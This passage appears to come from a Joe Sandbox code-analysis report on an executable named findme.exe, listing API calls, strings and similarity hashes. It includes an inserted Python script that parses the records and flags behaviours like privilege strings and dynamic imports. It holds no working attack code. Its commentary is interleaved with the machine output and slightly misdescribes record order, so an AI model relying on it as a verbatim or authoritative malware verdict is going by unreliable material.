                    • _free.LIBCMT ref: 004E77C8
                    • _free.LIBCMT ref: 004E77D2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Users\user\Desktop\findme.exe
                    • API String ID: 2506810119-2102845367
                    • Opcode ID: 1a7de3a3f6c14d17ff7a53ae9f54c55456fbc1e5b0727721471b77ddac8ca217
                    • Instruction ID: df3d5c9bc090f39a0c9aeb60e1ab54406794f800d567ad1c37d24abcdd997071
                    • Opcode Fuzzy Hash: 1a7de3a3f6c14d17ff7a53ae9f54c55456fbc1e5b0727721471b77ddac8ca217
                    • Instruction Fuzzy Hash: F931B371E04298AFDB21DF9BDC81D9FBBECEF95325B10406BE80497201D6746E41C759
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C7579
                      • Part of subcall function 004C3B3D: __EH_prolog.LIBCMT ref: 004C3B42
                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004C7640
                      • Part of subcall function 004C7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004C7C04
                      • Part of subcall function 004C7BF5: GetLastError.KERNEL32 ref: 004C7C4A
                      • Part of subcall function 004C7BF5: CloseHandle.KERNEL32(?), ref: 004C7C59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                    • API String ID: 3813983858-639343689
                    • Opcode ID: 4517a45b06c5e0bab3429b1b10dddfb261766876a13b123244fdd461eb9c468b
                    • Instruction ID: aefa47a941692cb365e2b4c121f784e6f479f5e18f3354665bb3b0d5c7961445
                    • Opcode Fuzzy Hash: 4517a45b06c5e0bab3429b1b10dddfb261766876a13b123244fdd461eb9c468b
                    • Instruction Fuzzy Hash: 1231C175A04208AFDF60EB65DC41FFE7BA8AF15358F00405FF444A7292DB788A48CB69
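The function records in this listing all share one layout: an APIs section (direct calls, plus indented "Part of subcall function" lines for calls made inside a callee), an optional Strings section, the memory-dump provenance, and a Similarity section whose "$"-joined API ID and String ID tokens and fuzzy hashes close the record. Two of the records here are worth pulling out by hand: the one above, which references SeRestorePrivilege and SeSecurityPrivilege around a GetCurrentProcess(0x20) call, and the earlier one that resolves Crypt32.dll from the system directory and looks up CryptProtectMemory/CryptUnprotectMemory through GetProcAddress, so those imports never appear in the import table. The Python below is an added example, not Joe Sandbox code or part of this report: it parses records in this layout and tags the ones an analyst would triage first. The sample input is constructed from three records on this page with their argument lists shortened; the flag names and the list of "interesting" exports are assumptions of the example, not report fields.

```python
"""Parse Joe Sandbox code-analysis function records and tag triage-relevant ones (added example)."""
import re
from dataclasses import dataclass, field

# One API line. Subcall lines carry a "Part of subcall function <addr>:" prefix; the argument
# list and the comma before "ref:" are optional (e.g. "__EH_prolog.LIBCMT ref: 004C7579").
_API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
_FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
_SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Hypothetical triage list: exports worth a look when resolved at run time instead of via the IAT.
_INTERESTING_EXPORTS = {"CryptProtectMemory", "CryptUnprotectMemory", "CorExitProcess"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)      # (name, module, args, ref), called directly
    subcalls: list = field(default_factory=list)  # same shape, reached through a callee
    fields: dict = field(default_factory=dict)    # 'Similarity' key/value pairs

    @property
    def strings(self):
        """Strings the function references, taken from the '$'-joined String ID field."""
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def resolved_exports(self):
        """Export names passed to GetProcAddress, i.e. imports hidden from the import table."""
        return [args.split(",")[-1].strip()
                for name, _mod, args, _ref in self.apis + self.subcalls
                if name == "GetProcAddress" and args]


def parse_records(text):
    """Split the listing into FunctionRecords; a record ends at its 'Instruction Fuzzy Hash' line."""
    records, cur, section = [], FunctionRecord(), None
    for line in text.splitlines():
        if line.strip() in _SECTIONS:
            section = line.strip()
            continue
        m = _API_RE.match(line)
        if section == "APIs" and m:
            entry = (m["name"], m["module"], m["args"] or "", m["ref"])
            (cur.subcalls if m["caller"] else cur.apis).append(entry)
            continue
        m = _FIELD_RE.match(line)
        if section == "Similarity" and m:
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records


def triage_flags(rec):
    """Tags (names chosen for this example) for behaviours an analyst would look at first."""
    names = {name for name, *_ in rec.apis + rec.subcalls}
    flags = set()
    if any(s.startswith("Se") and s.endswith("Privilege") for s in rec.strings):
        flags.add("privilege-strings")          # token privilege names, e.g. SeRestorePrivilege
    if "SetFileTime" in names:
        flags.add("file-time-modification")     # can rewrite timestamps on files it creates
    if {"LoadLibraryW", "GetSystemDirectoryW"} <= names:
        flags.add("system-dir-dll-load")        # loads a DLL by full system-directory path
    hits = set(rec.resolved_exports()) & _INTERESTING_EXPORTS
    if hits:
        flags.add("dynamic-import:" + ",".join(sorted(hits)))
    return flags


# Constructed sample: three records copied from this report, argument lists shortened.
SAMPLE = """\
APIs
  • Part of subcall function 004D0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
  • Part of subcall function 004D0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll), ref: 004D00C2
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004CEB92
• GetProcAddress.KERNEL32(005081C0,CryptUnprotectMemory), ref: 004CEBA2
Similarity
• API ID: AddressProc$DirectoryLibraryLoadSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
• Instruction Fuzzy Hash: 43E04FB4400741AECB319F359809F62BAE45B14706F10886FE5D6D3240EAF8D5408B68
APIs
• __EH_prolog.LIBCMT ref: 004C7579
• GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004C7640
  • Part of subcall function 004C7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004C7C04
  • Part of subcall function 004C7BF5: CloseHandle.KERNEL32(?), ref: 004C7C59
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• Instruction Fuzzy Hash: 1231C175A04208AFDF60EB65DC41FFE7BA8AF15358F00405FF444A7292DB788A48CB69
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 004CA351
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,004C80B7), ref: 004CA416
• CloseHandle.KERNEL32(?,?,00000000,?,004C80B7), ref: 004CA41D
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• Instruction Fuzzy Hash: 4A41FF34248388AED731DF64CC55FEFBBE4AB81308F04091EB9D0932D0C6689A58DB1B
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields["API ID"], sorted(triage_flags(rec)))
```

Running the script prints one line per record with its API ID and flags. The point of keeping direct calls and subcalls apart is that the report itself does: a GetProcAddress target seen inside a callee belongs to a shared helper, while a privilege-name string in the String ID belongs to the function whose record it sits in. Opcode ID, Instruction ID and the two fuzzy hashes are parsed into `fields` too, so the same records can be clustered across reports without touching the parser.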
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • EndDialog.USER32(?,00000001), ref: 004DA4B8
                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 004DA4CD
                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 004DA4E2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemText$DialogWindow
                    • String ID: ASKNEXTVOL
                    • API String ID: 445417207-3402441367
                    • Opcode ID: 3b3c590c13da68ed800c29be7d817a5d3cb0434f8d039cd36a32c7c6095d7561
                    • Instruction ID: b8e10f78fa092270fd0b93eb39e17e418e7376bcafd61b2028f9712889653349
                    • Opcode Fuzzy Hash: 3b3c590c13da68ed800c29be7d817a5d3cb0434f8d039cd36a32c7c6095d7561
                    • Instruction Fuzzy Hash: D311B132241200BFD6319F689D1DF667769FF5B304F10001BF241A62B1C7A99D2AE72B
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: __fprintf_l_strncpy
                    • String ID: $%s$@%s
                    • API String ID: 1857242416-834177443
                    • Opcode ID: 5955add4e059fb82231d99c46a0dd77aeda245338e2ca6c28b248330914c6d60
                    • Instruction ID: 16f1ba43965865991a3bb6a685a6f7e176ae7bd811b63152283c269a74801268
                    • Opcode Fuzzy Hash: 5955add4e059fb82231d99c46a0dd77aeda245338e2ca6c28b248330914c6d60
                    • Instruction Fuzzy Hash: D721A17680030CAADB60DEA4CC06FEE7BA8EF04300F14056BFE15962A1D379DA55CB59
                    APIs
                    • _swprintf.LIBCMT ref: 004CB51E
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • _wcschr.LIBVCRUNTIME ref: 004CB53C
                    • _wcschr.LIBVCRUNTIME ref: 004CB54C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                    • String ID: %c:\
                    • API String ID: 525462905-3142399695
                    • Opcode ID: 5e8b2cad25bf20489ddad9c7fafeca366854b0cfa32be38bf3eefedd3f9fc5c2
                    • Instruction ID: 90085dcb976f9ff5410f4c84b26625528309ace1dfcbfb99173f03e339a02b1b
                    • Opcode Fuzzy Hash: 5e8b2cad25bf20489ddad9c7fafeca366854b0cfa32be38bf3eefedd3f9fc5c2
                    • Instruction Fuzzy Hash: 4D012667A04311BA8A206B669C83E2BA7ACDF953A5B50440FF844D6181EB38D840C2EA
                    APIs
                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,004CABC5,00000008,?,00000000,?,004CCB88,?,00000000), ref: 004D06F3
                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,004CABC5,00000008,?,00000000,?,004CCB88,?,00000000), ref: 004D06FD
                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,004CABC5,00000008,?,00000000,?,004CCB88,?,00000000), ref: 004D070D
                    Strings
                    • Thread pool initialization failed., xrefs: 004D0725
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                    • String ID: Thread pool initialization failed.
                    • API String ID: 3340455307-2182114853
                    • Opcode ID: 69666459ad8da1b4fd7e2c6ae52150ab9344537eb944f9eb62d156701eb5bed1
                    • Instruction ID: f5bbf28ac96a5ca2a4809a39bdc09e5ed1494a50da235bdfe6dac32ffc3dd59d
                    • Opcode Fuzzy Hash: 69666459ad8da1b4fd7e2c6ae52150ab9344537eb944f9eb62d156701eb5bed1
                    • Instruction Fuzzy Hash: 7E115EB1500709AFC3215F66D884AABFBECEB95755F10482FF2DA87300DA756980CB68
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: RENAMEDLG$REPLACEFILEDLG
                    • API String ID: 0-56093855
                    • Opcode ID: aef791fac015be44292b5172a644a1b1d593de72a402d9d185e0f66e6b2f3a45
                    • Instruction ID: 2046ede449ac5a1f9c2796917fad776d5f1dfdb0911efbaddc2298fe1ddee447
                    • Opcode Fuzzy Hash: aef791fac015be44292b5172a644a1b1d593de72a402d9d185e0f66e6b2f3a45
                    • Instruction Fuzzy Hash: 3301B171A00259AFCB118F18EC44F6B3BA9F729394F004423F945D2370CA799C58FBA6
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                    • Instruction ID: 1f51b25c85aa2e5a4913f61bfb14e25708e34121f83b6753507b79a9b0cc1b51
                    • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
                    • Instruction Fuzzy Hash: 87A145719043C69FDB21CE1AC8917AEBBA5EF15311F1845AFE9859B3C1C23C9C42C759
                    APIs
                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,004C80B7,?,?,?), ref: 004CA351
                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,004C80B7,?,?), ref: 004CA395
                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,004C80B7,?,?,?,?,?,?,?,?), ref: 004CA416
                    • CloseHandle.KERNEL32(?,?,00000000,?,004C80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 004CA41D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: File$Create$CloseHandleTime
                    • String ID:
                    • API String ID: 2287278272-0
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004E89AD,?,00000000,?,00000001,?,?,00000001,004E89AD,?), ref: 004EC0E6
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004EC16F
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004E67E2,?), ref: 004EC181
                    • __freea.LIBCMT ref: 004EC18A
                      • Part of subcall function 004E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                    • String ID:
                    • API String ID: 2652629310-0
                    APIs
                    • GetDC.USER32(00000000), ref: 004D9DBE
                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D9DCD
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D9DDB
                    • ReleaseDC.USER32(00000000,00000000), ref: 004D9DE9
                    Similarity
                    • API ID: CapsDevice$Release
                    • String ID:
                    • API String ID: 1035833867-0
                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004E2016
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004E201B
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004E2020
                      • Part of subcall function 004E310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004E311F
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004E2035
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    APIs
                      • Part of subcall function 004D9DF1: GetDC.USER32(00000000), ref: 004D9DF5
                      • Part of subcall function 004D9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004D9E00
                      • Part of subcall function 004D9DF1: ReleaseDC.USER32(00000000,00000000), ref: 004D9E0B
                    • GetObjectW.GDI32(?,00000018,?), ref: 004D9F8D
                      • Part of subcall function 004DA1E5: GetDC.USER32(00000000), ref: 004DA1EE
                      • Part of subcall function 004DA1E5: GetObjectW.GDI32(?,00000018,?), ref: 004DA21D
                      • Part of subcall function 004DA1E5: ReleaseDC.USER32(00000000,?), ref: 004DA2B5
                    Similarity
                    • API ID: ObjectRelease$CapsDevice
                    • String ID: (
                    • API String ID: 1061551593-3887548279
                    Similarity
                    • API ID: _swprintf
                    • String ID: %ls$%s: %s
                    • API String ID: 589789837-2259941744
                    APIs
                    • _free.LIBCMT ref: 004EAA84
                      • Part of subcall function 004E8849: IsProcessorFeaturePresent.KERNEL32(00000017,004E8838,00000050,004F3958,?,004CCFE0,00000004,00500EE8,?,?,004E8845,00000000,00000000,00000000,00000000,00000000), ref: 004E884B
                      • Part of subcall function 004E8849: GetCurrentProcess.KERNEL32(C0000417,004F3958,00000050,00500EE8), ref: 004E886D
                      • Part of subcall function 004E8849: TerminateProcess.KERNEL32(00000000), ref: 004E8874
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                    • String ID: *?$.
                    • API String ID: 2667617558-3972193922
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C7730
                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004C78CC
                      • Part of subcall function 004CA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004CA27A,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA458
                      • Part of subcall function 004CA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004CA27A,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA489
                    Similarity
                    • API ID: File$Attributes$H_prologTime
                    • String ID: :
                    • API String ID: 1861295151-336475711
                    Similarity
                    • API ID:
                    • String ID: UNC$\\?\
                    • API String ID: 0-253988292
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004D43D8
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: HCO$XCO
                    • API String ID: 2005118841-3375322268
                    Similarity
                    • API ID:
                    • String ID: Shell.Explorer$about:blank
                    • API String ID: 0-874089819
                    APIs
                    • DialogBoxParamW.USER32(GETPASSWORD1,00010434,004DA990,?,?), ref: 004DD4C5
                    Similarity
                    • API ID: DialogParam
                    • String ID: GETPASSWORD1$xjQ
                    • API String ID: 665744214-1163178184
                    APIs
                      • Part of subcall function 004CEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004CEB92
                      • Part of subcall function 004CEB73: GetProcAddress.KERNEL32(005081C0,CryptUnprotectMemory), ref: 004CEBA2
                    • GetCurrentProcessId.KERNEL32(?,?,?,004CEBEC), ref: 004CEC84
                    Strings
                    • CryptProtectMemory failed, xrefs: 004CEC3B
                    • CryptUnprotectMemory failed, xrefs: 004CEC7C
                    Similarity
                    • API ID: AddressProc$CurrentProcess
                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                    • API String ID: 2190909847-396321323
                    Similarity
                    • API ID: _free
                    • String ID: XO
                    • API String ID: 269201875-962008992
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004DF25E
                    • ___raise_securityfailure.LIBCMT ref: 004DF345
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: 8R
                    • API String ID: 3761405300-3857851311
                    APIs
                    • CreateThread.KERNEL32(00000000,00010000,004D09D0,?,00000000,00000000), ref: 004D08AD
                    • SetThreadPriority.KERNEL32(?,00000000), ref: 004D08F4
                      • Part of subcall function 004C6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C6EAF
                    Similarity
                    • API ID: Thread$CreatePriority__vswprintf_c_l
                    • String ID: CreateThread failed
                    • API String ID: 2655393344-3849766595
                    APIs
                      • Part of subcall function 004E8FA5: GetLastError.KERNEL32(?,00500EE8,004E3E14,00500EE8,?,?,004E3713,00000050,?,00500EE8,00000200), ref: 004E8FA9
                      • Part of subcall function 004E8FA5: _free.LIBCMT ref: 004E8FDC
                      • Part of subcall function 004E8FA5: SetLastError.KERNEL32(00000000,?,00500EE8,00000200), ref: 004E901D
                      • Part of subcall function 004E8FA5: _abort.LIBCMT ref: 004E9023
                    • _abort.LIBCMT ref: 004EB2E0
                    • _free.LIBCMT ref: 004EB314
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLast_abort_free
                    • String ID: O
                    • API String ID: 289325740-4042636462
                    APIs
                      • Part of subcall function 004CDA98: _swprintf.LIBCMT ref: 004CDABE
                      • Part of subcall function 004CDA98: _strlen.LIBCMT ref: 004CDADF
                      • Part of subcall function 004CDA98: SetDlgItemTextW.USER32(?,004FE154,?), ref: 004CDB3F
                      • Part of subcall function 004CDA98: GetWindowRect.USER32(?,?), ref: 004CDB79
                      • Part of subcall function 004CDA98: GetClientRect.USER32(?,?), ref: 004CDB85
                    • GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                    • SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                    • String ID: 0
                    • API String ID: 2622349952-4108050209
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,004D0A78,?), ref: 004D0854
                    • GetLastError.KERNEL32(?), ref: 004D0860
                      • Part of subcall function 004C6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C6EAF
                    Strings
                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004D0869
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                    • API String ID: 1091760877-2248577382
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,004CD32F,?), ref: 004CDA53
                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,004CD32F,?), ref: 004CDA61
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    Joe Sandbox IDA Plugin
